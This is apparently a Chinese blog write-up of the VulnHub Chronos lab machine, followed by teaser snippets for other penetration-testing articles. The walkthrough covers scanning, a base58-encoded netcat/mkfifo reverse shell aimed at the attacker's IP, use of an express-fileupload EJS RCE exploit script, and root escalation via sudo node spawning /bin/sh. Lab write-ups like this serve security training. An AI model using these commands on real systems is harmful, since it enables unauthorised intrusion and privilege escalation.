vulnhub之Chronos的实践

VSole2022-07-17 21:15:28

今天实践的是vulnhub的Chronos镜像,

下载地址,https://download.vulnhub.com/chronos/Chronos.ova,

用workstation无法导入,换virtualbox没问题,

Kali攻击机还是在workstation下,地址扫描,

sudo netdiscover -r 192.168.1.0/24,根据经验,靶机地址是103,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.103,

浏览器访问,发现首页的源码里有提示,可以访问chronos.local:8000,

本地windows和kali攻击机都添加了chronos.local的hosts记录,

直接访问chronos.local:8000,发现能显示当前系统的时间,从源码中看到跟主页源码里一样的内容,

根据经验猜测format的内容是编码过的,经过验证发现是base58,

猜测这个位置有命令执行漏洞,构造一串反弹shell脚本,

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.106 4444 >/tmp/f,base58转换,

RHuraBnsjzxcoNY4XrKRdorq3g8R8oVnXEjCNSLCRikBctUTCCjGaaEw1WztLuPayMVYS7ZBhr4j3X8w9sP7Mrm4rYrQ3UbUjt9PjyA7wa1L5Jku,

在burpsuite里抓到访问的请求,

把base58编码后的内容换上去,主要还要换User-Agent: Chronos,

转发之前在kali攻击机上开启反弹shell监听,nc -lvp 4444,

这就拿到了反弹shell,id看一下不是root,需要进一步提权,

在当前账号下查到有用的信息,express-fileupload软件和版本,

网上搜到漏洞和利用方法,

https://dev.to/boiledsteak/simple-remote-code-execution-on-ejs-web-applications-with-express-fileupload-3325,

下载漏洞利用脚本,https://github.com/boiledsteak/EJS-Exploit/blob/main/attacker/EJS-RCE-attack.py,

根据实际情况进行修改,

kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer 80,

以及开启反弹shell监听,nc -lvp 8888,靶机那边下载并执行,

反弹shell这就又过来了,id确认还不是root,但是可sudo -l,发现node程序是root权限执行的,

搜索node的本地提权方法,

提权,sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})',

确认拿到root的shell,任务完成。

shelltmp
本作品采用《CC 协议》,转载必须注明作者和本文链接
接着老毛病就犯了,上去就输入了个1查询接着输入了1’啧啧啧,这明显有SQL注入哇。果断掏出SQLMAP神器。结局很完美,不仅存在注入,还是DBA的权限。初步信息搜集既然拿到了shell,那么第一步肯定是信息搜集了。免杀shellcode完美上线这里我用的K8gege的 Ladon插件进行扫描内网得,主要扫描出来的结果格式比较好看。横向渗透&进一步信息搜集内网第一波那必须的是MS17-010了,这里我同样用K8gege的Ladon。
网安引领时代,弥天点亮未来 0x00序言在日常工作中,如果办公电脑或者个人PC有以下两个方面的异常行为
前言建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会!反向shell-备忘录 通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互
反弹shell汇总
2021-07-28 10:01:11
反弹shell汇总
红队渗透项目之MinUv1
2022-07-05 21:13:22
红队渗透
描述SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。
上述操作均在gitlab默认配置情况下,若漏洞利用无法复现可留言,一起讨论研究。
上周在先知社区看到@Xgstar师傅写的《SQLserver写Webshell总结-突破中文路径》文章中提到一个利用批处理写Webshell至中文路径的思路,但最后他并没有成功利用这个思路写入Webshell。 因为之前也写过这类场景的利用思路,所以就想对他提到的这个思路以及遇到的问题简单测试下,关于更多写Webshell至中文路径的思路可参考我之前写的《MSSQL高权限注入写马至中文路径》。
如果手工测试无果后再用代理手法扫描网站,必要的时候设置二级代理。什么站能扫什么站不能扫,心里一定要有点 b 数!浅蓝的渗透测试导图以及小工具这里有一个更加详细的导图,可以做一个大致的方向参考,跟着方向逐一测试, 期间也可以巩固基础。
VSole
网络安全专家